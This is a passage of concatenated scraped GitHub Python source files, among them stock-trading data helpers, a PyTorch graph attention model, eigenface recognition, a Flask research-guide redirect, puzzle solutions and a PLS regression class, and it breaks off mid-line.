parse_closes(temp_W_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_W_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n stock.dataset = temp_W_BARSET_PARSED\n return temp_W_BARSET_PARSED\n\n\n################################################################################################################\ndef get_Dataset_3D(api, stock, DATA_PERIOD = 780):\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine 3 Day trend by pulling daily bars and take every three\n temp_3D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_3D_BARSET_PARSED = parse_closes(temp_3D_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_3D_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n new_data = skip_parse(interval = 3, data = temp_3D_BARSET_PARSED)\n #stock.dataset = temp_3D_BARSET_PARSED\n return new_data\n\n\n################################################################################################################\n###### Gets the baset for the Hourly or Minute Timeframe ####\ndef get_Dataset_IntraDay(api, stock, DATA_PERIOD = 260, temp_timeframe = \"Hour\"):\n\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_hours = None\n timeframe = None\n\n #Determine what start time should be based on timeframe. Pull extra bars for one minute timeframe in case we are computing after hours\n\n if(temp_timeframe == \"Hour\"):\n start_time_hours = (timeNow - dt.timedelta(hours=DATA_PERIOD)).isoformat()\n timeframe = TimeFrame.Hour\n\n elif(temp_timeframe == \"30min\"):\n start_time_hours = (timeNow - dt.timedelta(hours=DATA_PERIOD)).isoformat()\n timeframe = TimeFrame.Minute\n \n elif(temp_timeframe == \"15min\"):\n start_time_hours = (timeNow - dt.timedelta(hours= (DATA_PERIOD / 2))).isoformat()\n timeframe = TimeFrame.Minute\n\n elif(temp_timeframe == \"5min\"):\n start_time_hours = (timeNow - dt.timedelta(hours= (DATA_PERIOD / 4))).isoformat()\n timeframe = TimeFrame.Minute\n\n elif(temp_timeframe == \"1min\"):\n DATA_PERIOD = DATA_PERIOD\n start_time_hours = (timeNow - dt.timedelta(hours=(DATA_PERIOD / 60))).isoformat()\n timeframe = TimeFrame.Minute\n else:\n temp_error = \"timeframe in get_Dataset_IntraDay() is: \" + temp_timeframe\n logging.error(temp_error)\n logging.error(\"Timeframe in get_Dataset_IntraDay() Not Recognized\")\n\n\n #Determine IntraDay Trend bars for that timeframe\n temp_intra_BARSET = api.get_bars(stock.name, timeframe, start = start_time_hours, end = None) #limit = DATA_PERIOD)\n\n temp_intra_BARSET_MARKET = [] #declare variable\n\n #Get rid of pre/post market data. Keep only market data during market hours between 09:30 and 16:00. \n #Combine minute candles for 30min, 15 min, and 5 min\n if(temp_timeframe == \"Hour\" or temp_timeframe == \"30min\" or temp_timeframe == \"15min\" or temp_timeframe == \"5min\"):\n temp_intra_BARSET_MARKET = only_market_hours(temp_intra_BARSET, timeframe = temp_timeframe)\n \n elif(temp_timeframe == \"1min\"):\n #parse closes\n temp_intra_BARSET_MARKET = parse_closes(temp_intra_BARSET)\n \n else:\n logging.error(\"ERROR with timeframe in get_Dataset_IntraDay\")\n\n #Store attribute and return dataset\n stock.dataset = temp_intra_BARSET_MARKET\n return temp_intra_BARSET_MARKET\n\n###################################################################################################################\n###################################################################################################################\n#Removes pre/post market data leaving only market data.\n#In addition if the timeframe is 5min, 15 min, or 30min combine the 1 min candles to form larger timeframe candle\ndef only_market_hours(RAW_DATA, timeframe):\n\n parsed_array = []\n #Get rid of pre market and post-market data points and return an array of closing prices\n df_data = (RAW_DATA.df)\n new_df_data = df_data.between_time('09:30' , '16:00')\n\n #Convert datatframe to array\n #If timeframe is Hour go from dataframe -> Array\n if(timeframe == \"Hour\"):\n parsed_array = new_df_data.loc[:]['close'].values\n\n #If timeframe is 30min use for loop to pull 30 min closes\n elif(timeframe == \"30min\"):\n\n parsed_array = new_df_data.iloc[::30, :]['close'].values\n \n \n #Get rid of 0th index, and append current price to end\n #parsed_array.pop(0)\n #parsed_array.append(RAW_DATA[len(RAW_DATA) - 1].c) \n #print(parsed_array)\n #print(\"type is:\", type(parsed_array))\n\n #If timeframe is 15min use for loop to pull 30 min closes\n #elif(timeframe == \"15min\"):\n #for i in range(15 - 1, len(new_df_data.columns) - 1, 15):\n #parsed_array = new_df_data.loc[i]['close'].values\n\n #If timeframe is 15min use for loop to pull 30 min closes\n #elif(timeframe == \"5min\"):\n #for i in range(5 - 1, len(new_df_data.columns) - 1, 5):\n #parsed_array = new_df_data.loc[i]['close'].values\n\n #else:\n #error_string = \"Timeframe not recognized in only_market_hours() in markethealth.py. Timeframe is: \" + timeframe\n #logging.error(error_string)\n\n return parsed_array\n\n\n################################################################################################################\n################################################################################################################\n#Parses data by skipping by interval and removing data not needed to get custom timeframes\ndef skip_parse(interval = 3, data = None):\n \n parsed_data = []\n\n #Take a data point every interval length\n for i in range(0, len(data) - 1, interval):\n parsed_data.append(data[i])\n\n #Take final (partial/current data point if it has not been taken yet)\n parsed_data.append(data[len(data) - 1])\n\n return parsed_data\n\n#### Initialzes the timeframe, dataset for that timeframe(candle closes) and clears markers\ndef initialize_trend_data(stock_obj, timeframe_string, dataset):\n \n #Manually set timefram and initialize via function\n stock_obj.current_timeframe_string = timeframe_string\n stock_obj.set_timeframe_initial()\n\n #Set dataset\n del stock_obj.dataset\n stock_obj.dataset = dataset\n\n################################################################################################################\n################################################################################################################\n\n### Use historical data to determine the current trend on specified timeframe(s) ####\ndef get_starting_trends(api, group):\n\n #Function Constants (Amount of bars taken for computations)\n DATA_PERIOD_DAY = 260 \n\n #For each stock start by getting Daily Data Set\n for stock_obj in group.stock_objects_array:\n\n dataset_daily = get_Dataset_D(api, stock_obj, DATA_PERIOD_DAY)\n initialize_trend_data(stock_obj, \"Day\", dataset_daily)\n stock_obj.determine_ititial_trend()\n\n #####################################################################\n #For each stock Get Hourly Timeframe\n for stock_obj in group.stock_objects_array:\n\n dataset_hourly = get_Dataset_IntraDay(api, stock_obj, DATA_PERIOD_DAY * 3, \"Hour\")\n initialize_trend_data(stock_obj, \"Hour\", dataset_hourly)\n stock_obj.determine_ititial_trend()\n\n #####################################################################\n #For each stock Get Minute Timeframe\n for stock_obj in group.stock_objects_array:\n\n dataset_min = get_Dataset_IntraDay(api, stock_obj, DATA_PERIOD_DAY * 3, \"1min\")\n initialize_trend_data(stock_obj, \"1min\", dataset_min)\n stock_obj.determine_ititial_trend()\n\n ###############################################################################\n ##### CONSTRUCTOIN START ################################################\n #For each stock start by getting Weekly Data Set\n for stock_obj in group.stock_objects_array:\n\n dataset_weekly = get_Dataset_W(api, stock_obj, 100)\n initialize_trend_data(stock_obj, \"Week\", dataset_weekly)\n stock_obj.determine_ititial_trend()\n\n #3D Datatset\n for stock_obj in group.stock_objects_array:\n \n dataset_3D = get_Dataset_3D(api, stock_obj, DATA_PERIOD_DAY * 3)\n initialize_trend_data(stock_obj, \"3D\", dataset_3D)\n stock_obj.determine_ititial_trend()\n\n #30 Min Datatset\n for stock_obj in group.stock_objects_array:\n\n dataset_30min = get_Dataset_IntraDay(api, stock_obj, 1000, \"30min\")\n\n print(\"!!!!@@@@: size of arrray is\", len(dataset_30min))\n\n initialize_trend_data(stock_obj, \"30min\", dataset_30min)\n stock_obj.determine_ititial_trend()\n\n #15 Min Datatset\n #for stock_obj in group.stock_objects_array:\n\n #dataset_15min = get_Dataset_IntraDay(api, stock_obj, 1400, \"15min\")\n #initialize_trend_data(stock_obj, \"15min\", dataset_15min)\n #stock_obj.determine_ititial_trend()\n\n #5 Min Datatset\n #for stock_obj in group.stock_objects_array:\n\n #dataset_5min = get_Dataset_IntraDay(api, stock_obj, 1400, \"5min\")\n #initialize_trend_data(stock_obj, \"5min\", dataset_5min)\n #stock_obj.determine_ititial_trend()\n\n ###############################################################################\n ##### END ################################################\n\n#calculate SMAS\ndef get_sma_health(api, group_name):\n DATA_PERIOD_DAY = int((200 *(8/5)) + 10)\n\n #Get Daily data\n for name in group_name.stock_objects_array:\n dataset_daily = get_Dataset_D(api, name, DATA_PERIOD_DAY)\n\n #Get 200 SMA on Daily\n sma_200 = sma(dataset_daily, 200, name.name)\n\n #Get 50 SMA on Daily\n sma_50 = sma(dataset_daily, 50, name.name)\n\n #Store SMA attributes in stock object\n name.SMA_200 = sma_200\n name.SMA_50 = sma_50\n \n\ndef sma(data, length_sma , stock_name):\n\n current_sma = None\n length_data_set = len(data)\n start_index = length_data_set - length_sma\n \n #Compute SMA\n total = 0 \n try:\n for i in range(start_index, length_data_set):\n total = total + data[i]\n current_sma = round(total / length_sma, 2) \n\n except:\n temp_error = \"SMA can not be computed for: \" + stock_name\n logging.error(temp_error)\n\n return current_sma","repo_name":"tbaranoski/Trading_Quant","sub_path":"market_health.py","file_name":"market_health.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31650021925","text":"import torch\r\nfrom torch import nn\r\nfrom layers import GraphAttentionLayer\r\nfrom torch.nn import functional as F\r\n\r\n\r\nclass GAT(nn.Module):\r\n def __init__(self, in_size, hid_size, num_class, dropout, alpha, num_head):\r\n super(GAT, self).__init__()\r\n self.dropout = dropout\r\n\r\n self.attentions = list()\r\n for _ in range(num_head):\r\n self.attentions.append(GraphAttentionLayer(in_size, hid_size, dropout, alpha, concat=True))\r\n\r\n for i, attention in enumerate(self.attentions):\r\n self.add_module('attention_{}'.format(i), attention)\r\n\r\n self.out_att = GraphAttentionLayer(hid_size * num_head, num_class, dropout, alpha, concat=False)\r\n\r\n def forward(self, x, adj):\r\n x = F.dropout(x, self.dropout, training=self.training)\r\n x_list = list()\r\n for att in self.attentions:\r\n x_list.append(att(x, adj))\r\n x = torch.cat(x_list, dim=1)\r\n x = F.dropout(x, self.dropout, training=self.training)\r\n x = F.elu(self.out_att(x, adj))\r\n return F.log_softmax(x, dim=1)\r\n","repo_name":"PreckLi/Pytorch_GAT","sub_path":"Pytorch_GAT/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7804866694","text":"import logging\nimport datetime as dt\n\nfrom app.models import db, Translations\n\n\ndef add_translation(query_text, query_language, translated_text, translated_language, provider):\n try:\n translation = Translations(\n query_text=query_text, query_language=query_language,\n translated_text=translated_text, translated_language=translated_language,\n provider=provider, date_created=dt.datetime.now()\n )\n db.session.add(translation)\n db.session.commit()\n except Exception as e:\n logging.error(e)\n db.session.rollback()\n return None\n","repo_name":"AleksandrFrolov/BackofficeSS","sub_path":"app/models/translation_queries.py","file_name":"translation_queries.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34683109903","text":"import string\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import f_classif\r\n\r\nNGRAM_RANGE = (1, 3)\r\n\r\nTOP_K = 7500\r\n\r\nTOKEN_MODE = 'word'\r\n\r\nMIN_DOCUMENT_FREQUENCY = 5\r\n\r\ndef ngram_vectorize(train_texts, train_labels, val_texts, return_models = False):\r\n\r\n kwargs = {\r\n 'ngram_range': NGRAM_RANGE,\r\n 'dtype': np.float32, \r\n 'strip_accents': 'unicode',\r\n 'decode_error': 'replace',\r\n 'analyzer': TOKEN_MODE, \r\n 'min_df': MIN_DOCUMENT_FREQUENCY,\r\n }\r\n vectorizer = TfidfVectorizer(**kwargs)\r\n\r\n x_train = vectorizer.fit_transform(train_texts)\r\n\r\n x_val = vectorizer.transform(val_texts)\r\n\r\n selector = SelectKBest(f_classif, k=min(TOP_K, x_train.shape[1]))\r\n selector.fit(x_train, train_labels)\r\n x_train = selector.transform(x_train).astype(np.float32)\r\n x_val = selector.transform(x_val).astype(np.float32)\r\n\r\n x_train = x_train.toarray()\r\n x_val = x_val.toarray()\r\n\r\n if return_models:\r\n return x_train, x_val, vectorizer, selector\r\n else:\r\n return x_train, x_val\r\n\r\ndef vectorize(data, vectorizer, selector):\r\n data = vectorizer.transform(data)\r\n data = selector.transform(data).astype(np.float32)\r\n return data.toarray()\r\n\r\ndef meta_features(data, STOPWORDS):\r\n # word_count\r\n data['Całkowita ilość słów'] = data['text'].apply(lambda x: len(str(x).split()))\r\n data['Ilość słów bez powtórzeń'] = data['text'].apply(lambda x: len(set(str(x).split())))\r\n\r\n # stop_word_count\r\n data['Ilość stop-słów'] = data['text'].apply(lambda x: len([w for w in str(x).lower().split() if w in STOPWORDS]))\r\n\r\n # mean_word_length\r\n data['Średnia długość słowa'] = data['text'].apply(lambda x: np.mean([len(w) for w in str(x).split()]))\r\n\r\n # char_count\r\n data['Ilość symboli'] = data['text'].apply(lambda x: len(str(x)))\r\n\r\n # punctuation_count\r\n data['Ilość znaków interpunkcyjnych'] = data['text'].apply(lambda x: len([c for c in str(x) if c in string.punctuation]))\r\n return data\r\n\r\n\r\ndef vectorize_dataset(configuration, df):\r\n METAFEATURES = configuration.METAFEATURES\r\n df_train, df_test = train_test_split(df, test_size=0.1)\r\n scaler = StandardScaler()\r\n meta_train = scaler.fit_transform(df_train[METAFEATURES])\r\n meta_test = scaler.transform(df_test[METAFEATURES])\r\n train_x = df_train.drop(columns=['label'])\r\n train_y = df_train['label']\r\n\r\n test_x = df_test.drop(columns=['label'])\r\n test_y = df_test['label']\r\n\r\n text_train, text_test, vectorizer, selector = ngram_vectorize(train_x['clean_text'], train_y, test_x['clean_text'], return_models=True)\r\n train_ngram_x = np.concatenate([text_train, meta_train], axis=1)\r\n test_ngram_x = np.concatenate([text_test, meta_test], axis=1)\r\n return train_ngram_x, train_y, test_ngram_x, test_y, scaler, vectorizer, selector\r\n\r\ndef preprocess(configuration, df):\r\n STOPWORDS = configuration.STOPWORDS\r\n df = meta_features(df, STOPWORDS)\r\n \r\n try:\r\n df['year'] = df.date.dt.year.astype(str)\r\n except:\r\n df['year'] = 'None'\r\n\r\n return df","repo_name":"pSzyc/Climate","sub_path":"Classification/resources/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72337293265","text":"# import the necessary packages\nimport glob\nimport numpy as np\nimport cv2\n\nfrom matplotlib import pyplot as plt\nimport os\n# construct the argument parser and parse the arguments\ndata_path = \"C:/Users/maiho/PycharmProjects/DPT/database/Face_Detected\"\nindexed_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/index.csv\"\n\n\n\nface_vector = []\nimage_width = 240\nimage_length = 360\ntotal_pixels = image_width*image_length\n\n\nfor imagePath in glob.glob(data_path + \"/*.jpg\"):\n face_image = cv2.cvtColor(cv2.imread(imagePath), cv2.COLOR_RGB2GRAY)\n\n face_image = cv2.resize(face_image, (240, 360))\n # cv2.imshow(\"a\",face_image)\n # cv2.waitKey(0)\n # plt.imshow(face_image, cmap = 'gray', interpolation = 'bicubic')\n # plt.show()\n face_image = face_image.reshape(total_pixels, )\n face_vector.append(face_image)\n\nface_vector = np.asarray(face_vector)\n\nface_vector = face_vector.transpose()\n\n\n#STEP2: Normalize the face vectors by calculating the average face vector and subtracting it from each vector\navg_face_vector = face_vector.mean(axis=1)\n\navg_face_vector = avg_face_vector.reshape(face_vector.shape[0], 1)\nnormalized_face_vector = face_vector - avg_face_vector\nprint(normalized_face_vector)\n\n#STEP3: Calculate the Covariance Matrix or the Sigma\ncovariance_matrix = np.cov(np.transpose(normalized_face_vector))\n# covariance_matrix = np.transpose(normalized_face_vector).dot(normalized_face_vector)\nprint(covariance_matrix)\n\n# STEP4: Calculate Eigen Vectors\neigen_values, eigen_vectors = np.linalg.eig(covariance_matrix)\n\n# STEP5: Select the K best Eigen Faces, K < M\nprint(eigen_vectors.shape)\nk = 30\nk_eigen_vectors = eigen_vectors[0:k, :]\nprint(k_eigen_vectors.shape)\n\n#STEP6: Convert lower dimensionality K Eigen Vectors to Original Dimensionality\neigen_faces = k_eigen_vectors.dot(np.transpose(normalized_face_vector))\nprint(eigen_faces.shape)\n\n# STEP7: Represent Each eigen face as combination of the K Eigen Vectors\n# weights = eigen_faces.dot(normalized_face_vector)\nweights = np.transpose(normalized_face_vector).dot(np.transpose(eigen_faces))\nprint(weights[1])\n\n# STEP8: Testing Phase\ntest_add = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/s50_15.jpg\"\ntest_img = cv2.imread(test_add)\ntest_img = cv2.cvtColor(test_img, cv2.COLOR_RGB2GRAY)\ntest_img = cv2.resize(test_img, (240, 360))\ntest_img = test_img.reshape(total_pixels, 1)\n\ntest_normalized_face_vector = test_img - avg_face_vector\ntest_weight = np.transpose(test_normalized_face_vector).dot(np.transpose(eigen_faces))\nprint(test_weight.shape)\nindex = np.argmin(np.linalg.norm(test_weight - weights, axis=1))\n# print(\"------------------\")\n# print(weights[345])\nprint(index)\nfor i,imagePath in enumerate(glob.glob(data_path + \"/*.jpg\")):\n if(i==index):\n result = cv2.imread(imagePath)\n result = cv2.resize(result, (256, 256))\n cv2.imshow(\"Result\", result)\n cv2.waitKey(0)\n","repo_name":"thangnvkcn/MultimediaDatabaseAssignment","sub_path":"Face_Recognition_usingPCA/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9327202253","text":"#[Easy]Challenge_13.py\n'''Find the number of the year for the given date. \nFor example, january 1st would be 1, and december 31st \nis 365.\nfor extra credit, allow it to calculate leap years, \nas well.\n'''\n# Ugly code :(\nimport sys\nmnth = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n\ndef dayNum(day, month, leap):\n\tif month == 1:\n\t\treturn day\n\telif leap == 'y':\n\t\tif(month == 2 and day <= 28):\n\t\t\treturn((sum(mnth[:month-1])) + day)\n\t\telse:\n\t\t\treturn((sum(mnth[:month-1])) + day + 1)\n\telse:\n\t\treturn((sum(mnth[:month-1])) + day)\n\nday = input(\"Day(dd): \")\nif(day > 31 or day < 1):\n\tprint(\"Invalid Day Choice. Pick a number between 1 - 31.\")\n\texit()\nmonth = input(\"Month(mm): \")\nif(month > 12 or month < 1):\n\tprint(\"Invalid Month Choice. Pick a number between 1 - 12.\")\n\texit()\nleap = raw_input(\"Is it a leap year? (y or n): \")\nif(leap == 'y' or leap == 'n'):\n\tprint(dayNum(day, month, leap))\nelse:\n\tprint(\"Invalid choice. Use either y or n.\")\n\texit()","repo_name":"TheWhiteCrayon/DailyProgrammer","sub_path":"[Easy]Challenge_13.py","file_name":"[Easy]Challenge_13.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5931540015","text":"\"\"\"\nTest Flask module for research guides\n\n\"\"\"\nfrom flask import Blueprint\nfrom flask import request, render_template, redirect\nfrom ..common import util\n\nRESEARCHGUIDES = Blueprint('researchguides', __name__)\n\nWEBROOT = '/var/www/html/tlaservice-web'\n\nSAKAIDBNAME = util.CONFIG['app']['sakaidb']\nDBCONFIG = util.CONFIG[SAKAIDBNAME]\n\nRGURLHTTPS = 'https://www1.wjchen.org/sec-cgi-bin/cul/rschloc/rschloc?key='\nRGURLHTTP = 'http://www.wjchen.org/cgi-bin/cul/rschloc?key='\n\ndef rgurl(cid):\n \"\"\"\n Retrieve school and department from the database and generate a\n URL for the library redirect script\n\n \"\"\"\n conn = util.dbconnect(DBCONFIG)\n curr = conn.cursor()\n\n param = {'https': False}\n queryparameters = {\n 'site_id': cid\n }\n query = \"SELECT SIS_DEPARTMENT, SIS_SCHOOL \\\nFROM CU_COURSE_SITE \\\nWHERE SITE_ID = :site_id\"\n results = curr.execute(query, queryparameters).fetchall()\n if curr.rowcount > 0:\n param['url'] = RGURLHTTP + cid + '&dept=' + results[0][0] \\\n + '&sch=' + results[0][1]\n else:\n param['url'] = RGURLHTTP + cid\n\n curr.close()\n conn.close()\n return param\n\n@RESEARCHGUIDES.route('/launch', methods=['GET', 'POST'])\ndef frame():\n \"\"\"\n This extracts the course ID from the LTI parameters and passes it\n to rgurl() to get the URL for the library redirect script. The\n research guides do not have a Columbia HTTPS URL, so the tool\n generates a small HTML page that opens the research guide in a new\n window.\n \"\"\"\n param = {\n 'debug': False,\n 'https': False\n }\n\n if 'lis_course_offering_sourcedid' in request.form:\n param.update(rgurl(request.form['lis_course_offering_sourcedid']))\n else:\n param['error'] = \"There was no course ID specified.\"\n\n if param['https'] and not param['debug']:\n return redirect(param['url'], code=302)\n else:\n return render_template('redirect.html', param=param)\n\nif __name__ == \"__main__\":\n print('This requires Flask and Blueprint')\n","repo_name":"wjchen01/clti","sub_path":"canvastools/views/researchguides.py","file_name":"researchguides.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25654652215","text":"from collections import deque\n\n\ndef solve():\n N = int(input())\n S = input()\n ans = deque(S)\n \n l, r = 0, 0\n for i in range(N):\n if S[i] == '(':\n l += 1\n else:\n if 0 < l:\n l -= 1\n else:\n r += 1\n \n for _ in range(l):\n ans.append(')')\n for _ in range(r):\n ans.appendleft('(')\n print(''.join(ans))\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC064/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1966918486","text":"def solve1(ipt, print_result=True, **kwargs):\n ipt = [int(i) for i in ipt]\n step = 5 if kwargs.get('is_test') else 25\n\n invalid = 0\n for i in range(step, len(ipt)):\n target = ipt[i]\n seen = set()\n valid = False\n\n for j in range(i-step, i):\n candidate = ipt[j]\n\n if target - candidate in seen and target != target - candidate:\n valid = True\n break\n else:\n seen.add(candidate)\n\n if not valid:\n invalid = target\n\n if print_result:\n print(target)\n\n return invalid\n\ndef solve2(ipt, **kwargs):\n invalid = solve1(ipt, False, **kwargs)\n ipt = [int(i) for i in ipt]\n\n for i in range(len(ipt)):\n total = ipt[i]\n ran = [ipt[i]]\n for j in range(i+1, len(ipt)):\n ran.append(ipt[j])\n total += ipt[j]\n\n if total == invalid:\n print((min(ran) + max(ran)))\n return\n elif total > invalid:\n break","repo_name":"Perfect5th/aoc-2020","sub_path":"day9/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19086901540","text":"from sklearn.model_selection import cross_val_predict, LeaveOneOut, train_test_split, GridSearchCV\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.metrics import mean_squared_error\nfrom utils import external_validation, cross_validation\n\nimport pandas as pd\nimport numpy as np\n\nclass PLSR():\n \"\"\"\n This class receive by default a pandas Dataframe and some params for perform a PLS regression.\n \n The params are:\n - components: number of components in pls regression\n - cross_validation_type: type of cross-validation that will be performed. Insert int to use \n k-fold strategy and 'loo' to use leave one out strategy. Deafult is 'loo'.\n - split_for_validation: should be a float between 0 and 1. If informed, this represents a size of\n dataset that will be used as test samples.\n - dataset_validation: If informed, should be a dataframe with sample that will be used for validate model\n - scale: if true, then the data is scaled\n - plsr_random_state: is the seed for random number generetor. Its used for split dataset\n \n If split_for_validation and dataset_validation are both informed, then only dataset_validation is considered.\n \"\"\"\n\n def __init__(self, dataset, components=2, cross_validation_type='loo', split_for_validation=None, dataset_validation=None, scale=False, plsr_random_state=123):\n self.dataset = dataset\n self.components = components\n self.cross_validation_type = cross_validation_type\n self.split_for_validation = split_for_validation\n self.dataset_validation = dataset_validation\n self.scaleOpt = scale\n self.modelr_random_state = plsr_random_state\n\n self._xCal = pd.DataFrame()\n self._xVal = pd.DataFrame()\n self._yCal = pd.DataFrame()\n self._yVal = pd.DataFrame()\n\n self._cv = None\n\n self.metrics = {}\n\n # checking if the parameters was inserted correctly\n\n if not isinstance(self.dataset, pd.DataFrame):\n raise ValueError('The dataset should be a pd.DataFrame.')\n\n if type(self.components) not in [int]:\n raise ValueError('components should be a integer')\n\n if (self.dataset_validation is None) and (self.split_for_validation is None):\n raise ValueError('Should be defined the samples for validation or size of test size for split the dataset.')\n \n if (not self.split_for_validation is None) and (self.dataset_validation is None):\n if self.split_for_validation == 'all':\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n elif isinstance(self.split_for_validation, float):\n self._xCal, self._xVal, self._yCal, self._yVal = train_test_split(self.dataset.iloc[:, 2:], self.dataset.iloc[:, 1], test_size=split_for_validation, random_state=self.rf_random_state)\n else:\n raise ValueError(\"split_for_validation need be a float value between 0 and 1 for split dataset. Use 'all' for calibrate with all samples of dataset.\")\n\n if not self.dataset_validation is None:\n if isinstance(self.dataset_validation, pd.DataFrame):\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n self._xVal = self.dataset_validation.iloc[:, 2:]\n self._yVal = self.dataset_validation.iloc[:, 1]\n else:\n raise ValueError(\"dataset_validation need be a pd.DataFrame\")\n\n\n if isinstance(cross_validation_type, str):\n if cross_validation_type == \"loo\":\n self._cv = LeaveOneOut()\n elif (type(cross_validation_type) in [int]) and (cross_validation_type > 0):\n self._cv = cross_validation_type\n else:\n raise ValueError(\"The cross_validation_type should be a positive integer for k-fold method ou 'loo' for leave one out cross validation.\")\n\n if self.scaleOpt not in [True, False]:\n raise ValueError('The scale option should be a boolean.')\n \n def search_hyperparameters(self, components=[1, 21], n_processors=1, verbose=0, scoring='neg_root_mean_squared_error'):\n \n step_value = lambda list_of_values: 1 if (len(list_of_values) < 3) else list_of_values[2]\n components = np.arange(start = components[0], stop = components[1], step = step_value(components))\n \n grid = { \"n_components\": components }\n\n pls = PLSRegression(scale=self.scaleOpt)\n pls_grid_search = GridSearchCV(estimator = pls, param_grid = grid, cv = self._cv, n_jobs = n_processors, verbose=verbose, scoring=scoring)\n\n pls_grid_search.fit(self._xCal, self._yCal)\n\n get_params = lambda dict_params, param, default_params: dict_params[param] if (param in dict_params) else default_params\n \n self._best_params = pls_grid_search.best_params_\n self.components = get_params(pls_grid_search.best_params_, 'n_components', self.components)\n \n \n def calibrate(self):\n \"\"\"\n runs the plsr model with instance of PLSRegression from sklearn\n \"\"\" \n\n self.model = PLSRegression(n_components=self.components, scale=self.scaleOpt)\n self.model.fit(self._xCal, self._yCal)\n\n y_cal_predict = self.model.predict(self._xCal)\n y_cal_predict = [i[0] for i in y_cal_predict]\n \n r_correlation = np.corrcoef(y_cal_predict, self._yCal)[0][1]\n \n r2_cal = self.model.score(self._xCal, self._yCal)\n\n rmse = mean_squared_error(self._yCal, y_cal_predict, squared=False)\n\n nsamples = self._xCal.shape[0]\n\n calibration_metrics = {'n_samples': nsamples, 'R': r_correlation, 'R2': r2_cal, 'RMSE': rmse}\n\n self.metrics['calibration'] = calibration_metrics \n \n \n def cross_validate(self):\n \n r_correlation, r2_cv, rmse_cv, bias, predicted_values = cross_validation(self.model, self._xCal, self._yCal, cv=self._cv)\n\n method = 'LOO'\n if isinstance(self._cv, int):\n method = \"{}-fold\".format(self._cv)\n\n cross_validation_metrics = {'R': r_correlation, 'R2': r2_cv, 'RMSE': rmse_cv, 'bias': bias, 'method': method, 'predicted_values': predicted_values }\n\n self.metrics['cross_validation'] = cross_validation_metrics\n \n\n def validate(self):\n\n r_correlation, r2_ve, rmse_ve, bias, predicted_values = external_validation(self.model, self._xVal, self._yVal)\n\n nsamples = self._xVal.shape[0]\n validation = {'R': r_correlation, 'R2': r2_ve, 'RMSE': rmse_ve, 'bias': bias, 'n_samples': nsamples, 'predicted_values': predicted_values}\n\n self.metrics['validation'] = validation\n \n\n def get_coefs(self, get_intercept=False):\n \n # return a array with coefficientes. If get_intercept == True, then intercept is calculated \n # an insert in coefs array at index 0\n \n coefs = np.array([coef[0] for coef in self.model.coef_])\n if get_intercept == True:\n self.model._intercept = self.model.y_mean_ - np.dot(self.model.x_mean_, self.model.coef_)\n coefs = np.insert(coefs, 0, self.model._intercept) \n\n return coefs\n \n def test_many_components(self, components=[1,20], target='cv'):\n\n if not isinstance(components, list):\n raise ValueError('components should be a list of integers.')\n\n step_value = lambda list_of_values: 1 if (len(list_of_values) < 3) else list_of_values[2]\n components_for_test = [int(x) for x in np.arange(start=components[0], stop=components[1], step=step_value(components))]\n\n rmse_cv = []\n r2_cv = []\n rmse_ve = []\n r2_ve = []\n default = self.components\n\n for comp in components_for_test:\n\n self.components = comp\n\n if target=='cv':\n self.calibrate()\n self.cross_validate()\n rmse_cv.append(self.metrics['cross_validation']['RMSE'])\n r2_cv.append(self.metrics['cross_validation']['R2'])\n elif target=='pred':\n 